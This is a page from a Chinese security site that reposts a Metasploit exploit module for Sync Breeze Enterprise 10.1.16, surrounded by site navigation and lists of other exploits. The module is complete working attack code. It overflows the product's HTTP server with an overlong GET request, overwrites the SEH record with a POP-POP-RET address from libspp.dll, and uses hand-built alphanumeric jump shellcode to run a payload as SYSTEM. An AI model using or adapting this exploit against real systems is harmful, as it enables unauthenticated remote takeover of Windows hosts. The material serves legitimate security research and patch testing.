首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sync Breeze Enterprise 10.1.16 - Buffer Overflow (SEH) (Metasploit)
来源:metasploit.com 作者:wetw0rk 发布时间:2017-10-16  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
 
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SyncBreeze v10.1.16 SEH GET Overflow',
      'Description'    => %q{
          There exists an unauthenticated SEH based vulnerability in the HTTP
        server of Sync Breeze Enterprise v10.1.16, when sending a GET request
        with an excessive length it is possible for a malicious user to overwrite the
        SEH record and execute a payload that would run under the Windows NT AUTHORITY\SYSTEM account.
 
        The SEH record is overwritten with a "POP,POP,RET" pointer from the application
        library libspp.dll. This exploit has been successfully tested on Windows XP, 7 and
        10 (x86->x64). It should work against all versions of Windows and service packs.
      },
 
      'Author'         => 'wetw0rk',
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'       => 800,
          'EncoderType' => "alpha_upper",
          'BadChars'    => "\x00\x0a\x0d"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows XP/7/10 (SyncBreez Enterprise v10.1.16)',
            { 'Ret'    => 0x1001C65C,
              'Offset' => 2495
            }]
        ],
      'DisclosureDate' => 'October 11 2017',
      'DefaultTarget'  => 0))
 
    register_options([Opt::RPORT(80)])
 
  end
 
  def exploit
    connect
 
    print_status("Trying #{target.name}")
 
    # Make the JMP to the payload, else JMP into the A's acting as NOP's
    # Using AlphaNum technique learned from Mut's in OSCE (aka a legend)
    jumpcode = "\x25\x4a\x4d\x4e\x55"   # and    eax,0x554e4d4a
    jumpcode << "\x25\x35\x32\x31\x2a"    # and    eax,0x2a313235
    jumpcode << "\x2d\x37\x37\x37\x37"    # sub    eax,0x37373737
    jumpcode << "\x2d\x74\x74\x74\x74"    # sub    eax,0x74747474
    jumpcode << "\x2d\x55\x54\x55\x70"    # sub    eax,0x70555455
    jumpcode << "\x50"            # push   eax
    jumpcode << "\x25\x4a\x4d\x4e\x55"    # and    eax,0x554e4d4a
    jumpcode << "\x25\x35\x32\x31\x2a"    # and    eax,0x2a313235
    jumpcode << "\x2d\x2d\x76\x7a\x63"    # sub    eax,0x637a762d
    jumpcode << "\x2d\x2d\x76\x7a\x30"    # sub    eax,0x307a762d
    jumpcode << "\x2d\x25\x50\x7a\x30"    # sub    eax,0x307a5025
    jumpcode << "\x50"            # push   eax
    jumpcode << "\xff\xe4"        # jmp    esp
    # greetz to kluo, and abatchy17
    sploit = payload.encoded
    sploit << 'A' * (target['Offset'] - payload.encoded.length)
    sploit << "\x74\x06\x75\x06"
    sploit << [target.ret].pack('V')
    sploit << jumpcode
    sploit << 'A' * (9067 - (target['Offset'] + payload.encoded.length + 8 + jumpcode.length))
 
    send_request_cgi(
      'uri'        =>  '/' + sploit,
      'method'     =>  'GET',
      'host'       =>  '4.2.2.2',
      'connection' =>  'keep-alive'
    )
 
    handler
    disconnect
  end
 
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows Escalate UAC Protectio
·Opentext Documentum Content Se
·Tomcat JSP Upload Bypass Remot
·Opentext Documentum Content Se
·Sync Breeze Enterprise 10.1.16
·Opentext Documentum Content Se
·ASX to MP3 3.1.3.7 - '.m3u' Bu
·Opentext Documentum Content Se
·VX Search Enterprise 10.1.12 -
·Microsoft Edge Chakra JIT Inco
·Trend Micro InterScan Messagin
·Microsoft Edge Chakra JIT Fail
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved